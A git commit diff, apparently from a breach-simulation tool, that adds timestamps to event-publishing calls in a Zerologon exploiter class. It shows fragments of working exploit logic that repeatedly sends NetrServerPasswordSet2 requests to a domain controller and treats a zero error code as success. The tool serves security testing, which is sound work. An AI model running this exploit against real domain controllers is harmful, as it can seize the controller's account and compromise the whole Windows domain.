Agent: Add timestamps to publish calls

This commit is contained in:
Kekoa Kaaikala 2022-10-07 20:27:14 +00:00
parent 8eb3c94a94
commit 88d2bf7140
1 changed files with 14 additions and 17 deletions

View File

@ -187,19 +187,20 @@ class ZerologonExploiter(HostExploiter):
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
exploit_attempt_result = self.try_exploit_attempt(rpc_con)
exploit_attempt_result, timestamp = self.try_exploit_attempt(rpc_con)
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result)
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result, timestamp)
if is_exploited:
return True
return False
def try_exploit_attempt(self, rpc_con) -> Optional[object]:
def try_exploit_attempt(self, rpc_con) -> Tuple[Optional[object], float]:
error_message = ""
timestamp = time()
try:
exploit_attempt_result = self.attempt_exploit(rpc_con)
return exploit_attempt_result
return exploit_attempt_result, timestamp
except nrpc.DCERPCSessionError as err:
# Failure should be due to a STATUS_ACCESS_DENIED error.
# Otherwise, the attack is probably not working.
@ -210,12 +211,9 @@ class ZerologonExploiter(HostExploiter):
error_message = f"Unexpected error: {err}"
logger.info(error_message)
self._publish_exploitation_event(
success=False,
error_message=error_message,
)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return None
return None, timestamp
def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
request = nrpc.NetrServerPasswordSet2()
@ -236,25 +234,24 @@ class ZerologonExploiter(HostExploiter):
request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
request["Authenticator"] = authenticator
def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool:
def assess_exploit_attempt_result(self, exploit_attempt_result, timestamp: float) -> bool:
if exploit_attempt_result:
if exploit_attempt_result["ErrorCode"] == 0:
self.report_login_attempt(result=True, user=self.dc_name)
_exploited = True
logger.info("Exploit complete!")
self._publish_exploitation_event(success=True)
self._publish_exploitation_event(timestamp, True)
else:
self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False
error_message = f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
error_message = (
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
"Something went wrong."
)
logger.info(error_message)
self._publish_exploitation_event(
success=False,
error_message=error_message,
)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return _exploited
return False